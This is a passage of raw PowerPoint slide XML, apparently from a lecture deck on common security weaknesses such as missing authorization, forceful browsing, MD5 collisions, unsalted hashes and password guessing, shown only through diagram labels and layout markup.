                <a:gd name="adj1" fmla="val -60069"/>
                <a:gd name="adj2" fmla="val 30113"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="9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Hello admin!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5914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42368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Missing/Incorrect Authorization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21913-DCA6-2749-BF68-9D3623614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61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078373" y="1260748"/>
            <a:ext cx="718457" cy="92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32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039671" y="1337889"/>
            <a:ext cx="718457" cy="872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2039671" y="214364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9C724-D387-0645-AD03-15F0B8D33AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006714" y="2187548"/>
            <a:ext cx="86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/admin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22649" y="3688055"/>
            <a:ext cx="952500" cy="952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1914758" y="4640555"/>
            <a:ext cx="96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E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1814967" y="3096905"/>
            <a:ext cx="1175083" cy="7219"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3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B146178-72F2-974B-BB4F-8808455E4F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2568179" y="1599985"/>
            <a:ext cx="750925" cy="1075049"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30442"/>
              <a:gd name="adj2" fmla="val 67043"/>
            </a:avLst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6AD4CEB-26B0-0746-B537-EFE45C343400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4083183" y="1531454"/>
            <a:ext cx="802757" cy="1187621"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28477"/>
              <a:gd name="adj2" fmla="val 69559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ED7DDE3-48F9-A349-B146-4C9BC97FFCC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355334" y="2673673"/>
            <a:ext cx="1043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Forceful </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsing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A95741-703D-094F-98A4-B6E2CE2F9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43" t="2194" r="2456" b="66606"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481167" y="1298909"/>
            <a:ext cx="718457" cy="926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3FAB9-066A-034C-8859-182C5EC6ED6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426169" y="2157311"/>
            <a:ext cx="92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/limited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2791556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Missing Encryption of Sensitive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32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507314" y="1431834"/>
            <a:ext cx="718457" cy="872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1507314" y="2237585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/login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90292" y="4101413"/>
            <a:ext cx="952500" cy="952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1565021" y="510437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E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1122903" y="3350556"/>
            <a:ext cx="1494496" cy="7219"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3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B146178-72F2-974B-BB4F-8808455E4F2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225771" y="1868253"/>
            <a:ext cx="1622851" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72384"/>
            </a:avLst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75853034-607F-5A46-AF53-671BEBDC74EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144227" y="3655985"/>
            <a:ext cx="2546770" cy="853384"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="9000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="50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user: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eve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pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ABCDEFG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A2E31EB4-DA07-574F-AF8A-4C27D3735E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576181" y="1196117"/>
            <a:ext cx="2968668" cy="2304908"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln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3290B-35DE-2740-87F9-3E1EBBF4BEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4496981" y="1301835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F2B7407-F54F-8E4E-B55C-FA39C397C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852414"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3848622" y="1959266"/>
          <a:ext cx="242378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195">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="839244">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="832907464"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008347">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1141760440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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97765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470997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ABCDEFG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265560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27319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29526945-CCB0-3041-B7E9-1015ACB53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025775" y="4129717"/>
            <a:ext cx="952500" cy="9525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615CE2-F4DC-6A4C-9BC9-8B65BB21197D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6006986" y="5093131"/>
            <a:ext cx="96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9E343B43-8C29-C14B-B106-F29A19F9789E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5574146" y="3201838"/>
            <a:ext cx="1522800" cy="332957"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -25676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FE4F600-5B81-8C47-99BC-5D8CBC86C129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226796" y="3635029"/>
            <a:ext cx="131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breach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351394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51715C61-952D-8E41-95AA-3E098908E3FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="5"/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2116212" y="2232102"/>
            <a:ext cx="2008007" cy="2939203"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -171390"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="123825">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="50000"/>
                <a:alpha val="3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019F278-5918-4844-9360-D0F6379D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97" y="285886"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of a Broken Crypto Algorithm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79278438-1F32-8642-8F77-1921373ABF6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204684" y="1675596"/>
            <a:ext cx="870558" cy="1330651"/>
          </a:xfrm>
          <a:prstGeom prst="cub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8744EB57-9B28-1E47-9B45-665580CDC03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253661" y="1675596"/>
            <a:ext cx="870558" cy="1330651"/>
          </a:xfrm>
          <a:prstGeom prst="cub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135DD-8E7A-8041-9988-8EFDED062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10" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4798071" y="2013795"/>
            <a:ext cx="718457" cy="87283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2602973-A5BC-3E44-AA7D-E379A474E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63712" y="4695055"/>
            <a:ext cx="952500" cy="95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5590B4-4ED1-FF48-9D1D-82FDFE5F903B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331223" y="565425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459FA23F-A456-8144-8165-48011C5A2E14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 rot="5400000">
            <a:off x="1015319" y="4070411"/>
            <a:ext cx="1249288" cy="1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A6D62B-6B1A-F441-840D-3F665413C700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903992" y="3076435"/>
            <a:ext cx="147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Secure Server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7CF9D6-1F8B-1342-B0B5-BBD8C44A0370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684751" y="3951962"/>
            <a:ext cx="1942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File Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MD5, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1234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BCB06-6F8D-9942-B678-33D0B5995107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329716" y="2795923"/>
            <a:ext cx="260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MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Expected File)=1234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5A33F9F-A32F-E540-A42C-9D07A416B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397501" y="3595241"/>
            <a:ext cx="952500" cy="952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FA0CE29-9A34-0A45-8D83-CC2098AE5897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298751" y="4329520"/>
            <a:ext cx="1098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MD5 Collision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack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8ED64E-B341-1642-843D-A9FBF87B9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10" t="61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555739" y="4478508"/>
            <a:ext cx="718457" cy="9262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EA79ED-CBF7-BB49-8052-48FFDEC69A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2772219" y="5299503"/>
            <a:ext cx="226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MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Malware)=1234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9CB3F3-206D-4946-8128-7B6D87BE8FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2772219" y="3142044"/>
            <a:ext cx="1849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Download Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Not Secure)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FAB52-A2FE-9848-AE0A-ECC0CA43FFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6108997" y="3351797"/>
            <a:ext cx="955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Man-in-the-middle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F10C84C-F030-284A-BF43-67AE53ABD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10" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605693" y="4478508"/>
            <a:ext cx="718457" cy="8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22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C3C7-1406-1E4B-AA89-63A52DA3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871" y="336144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Unsalted Hash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86D53-E484-A94C-B33B-6CAD9A80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32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="948004" y="1443409"/>
            <a:ext cx="718457" cy="872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D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948004" y="224916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/login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7DB8B7E-0945-BA4E-92AC-0C5EE259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38200" y="4182888"/>
            <a:ext cx="952500" cy="952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BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998492" y="510425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E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="532252" y="3400690"/>
            <a:ext cx="1564396" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3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B146178-72F2-974B-BB4F-8808455E4F2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666461" y="1879828"/>
            <a:ext cx="1638144" cy="842889"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48853"/>
            </a:avLst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75853034-607F-5A46-AF53-671BEBDC74EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584917" y="3667560"/>
            <a:ext cx="2546770" cy="853384"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="9000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="50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user: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eve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pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ABCDEFG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A2E31EB4-DA07-574F-AF8A-4C27D3735E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016871" y="1207692"/>
            <a:ext cx="2968668" cy="2304908"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln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3290B-35DE-2740-87F9-3E1EBBF4BEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937671" y="1313410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F2B7407-F54F-8E4E-B55C-FA39C397C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421087"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3306922" y="2024679"/>
          <a:ext cx="242378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195">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="839244">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="832907464"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008347">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1141760440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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passhash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97765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470997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E9A92A2…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265560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5165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27319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29526945-CCB0-3041-B7E9-1015ACB53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454792" y="4182888"/>
            <a:ext cx="952500" cy="9525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615CE2-F4DC-6A4C-9BC9-8B65BB21197D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442590" y="5107084"/>
            <a:ext cx="96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E4F600-5B81-8C47-99BC-5D8CBC86C129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4615430" y="3754280"/>
            <a:ext cx="131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breach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4BC77C3-685E-0E43-B15B-A20EA9FF91F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05878" y="3010589"/>
            <a:ext cx="1522802" cy="727525"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -15805"/>
            </a:avLst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C19FCB7-532C-BC4F-A5E6-AE42EE5AF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314128"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6518029" y="3667560"/>
          <a:ext cx="2744901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3190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="669773">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="832907464"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1141938">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1141760440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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md5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sha256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97765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470997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ABCDEFG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BB74…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E9A92A2…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265560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27319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69026FA9-52F8-EC4D-AA8E-D6D4746E6175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812812" y="3298228"/>
            <a:ext cx="2155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Precomputed hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4030188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2BA3-307F-D840-9F44-974A71B2E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963" y="346237"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Guessing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D8679-1F9A-2648-8F7C-86B30C5BB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0" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4958235" y="1690688"/>
            <a:ext cx="718457" cy="8728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B10130-A562-DD4F-BCBD-74A67D5A6E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889342" y="2563525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/login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058B272-AACE-CA40-ACD0-650290D3E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10518" y="1650856"/>
            <a:ext cx="9525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61651-A63F-2341-9B45-5037976551C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198316" y="2575052"/>
            <a:ext cx="96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399A93-1375-A142-B811-E56CD1A01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49936"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="707721" y="1690688"/>
          <a:ext cx="1302705" cy="13716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302705">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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123456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470997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265560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27319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ABCDEFG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782707"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661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12359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6969D6-52B2-2D4D-9BD3-A2D9CEE20C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761850" y="3133280"/>
            <a:ext cx="116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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passwords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D7B3EE-DF53-E649-A73D-7981F8164B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="2896313"/>
            <a:ext cx="8744" cy="3610958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CD0E3E-4EA2-A044-9E70-1BADEEACE9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214196" y="2899032"/>
            <a:ext cx="0" cy="3551872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0FBE9ED-0A51-DC44-B610-9B72D88A61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1000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="181217">
            <a:off x="5909959" y="1653210"/>
            <a:ext cx="2016164" cy="22056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4D0933-D312-5A45-B115-9DACCD38BF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142701" y="3855588"/>
            <a:ext cx="166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Password Policy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1444E6-93CC-7C4A-A11E-AB559843EDAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598595" y="1787476"/>
            <a:ext cx="755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trike="sngStrike" dirty="0"/>
              <a:t>Lockout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7F43FB-6CA6-0547-AD01-C445EAFD5372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563606" y="2095807"/>
            <a:ext cx="1004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trike="sngStrike" dirty="0"/>
              <a:t>Complexity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" strike="sngStrike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3C0ABE-3687-3840-9DE4-121F5FA9B675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574756" y="3278357"/>
